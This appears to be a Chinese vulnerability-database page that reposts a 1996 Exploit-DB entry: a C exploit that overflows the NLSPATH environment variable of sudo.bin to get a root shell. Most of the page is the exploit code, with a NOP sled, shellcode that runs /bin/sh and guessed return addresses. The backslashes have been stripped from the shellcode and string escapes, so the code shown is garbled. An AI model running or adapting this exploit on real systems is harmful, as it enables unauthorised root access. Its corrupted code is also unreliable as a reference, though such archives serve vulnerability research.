sudo.bin – NLSPATH Privilege Escalation-安全小百科

sudo.bin – NLSPATH Privilege Escalation

漏洞ID	1053340	漏洞类型
发布时间	1996-02-13	更新时间	1996-02-13
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/319

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_SUDO "/usr/bin/sudo.bin"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
   "xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
   "x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   printf("SUDO.BIN exploit coded by _PHANTOM_ 1997n");
   setenv("NLSPATH",buff,1);
   execl(PATH_SUDO, "sudo.bin","bash", NULL);
}



// milw0rm.com [1996-02-13]

相关推荐: Multiple Vendor .BAT/.CMD Remote Command Execution Vulnerability

Multiple Vendor .BAT/.CMD Remote Command Execution Vulnerability 漏洞ID 1105167 漏洞类型 Input Validation Error 发布时间 1996-03-01 更新时间 199…

文章版权归作者所有，未经允许请勿转载。

THE END